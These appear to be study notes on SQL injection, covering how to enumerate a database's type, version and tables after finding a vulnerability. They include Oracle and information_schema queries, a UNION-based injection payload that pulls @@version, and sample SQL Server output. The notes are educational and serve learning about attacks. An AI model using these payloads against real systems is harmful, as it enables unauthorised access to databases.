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## Examining the Database
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Following initial identification of an SQL injection vulnerability, it is generally useful to obtain
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some information about the database itself. This information can often pave the way for further
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exploitation.
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- Specific syntax depends on the database type
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Enumerating Version (Oracle)
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```
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SELECT * FROM v$version
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```
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Enumerating Tables
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```
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SELECT * FROM information_schema.tables
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```
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## More Examination
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Information you need to gather:
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- Type of database software
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- Version of database software
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- Contents of the database (columns and tables)
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Querying the Database Type and Version
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![[Pasted image 20221210161338.png]]
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Example of using a UNION attack:
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```
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' UNION SELECT @@version--
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```
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Might return the following version information:
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Microsoft SQL Server 2016 (SP2) (KB4052908) - 13.0.5026.0 (X64)
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Mar 18 2018 09:11:49
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Copyright (c) Microsoft Corporation
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Standard Edition (64-bit) on Windows Server 2016 Standard 10.0 <X64> (Build
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14393: ) (Hypervisor)
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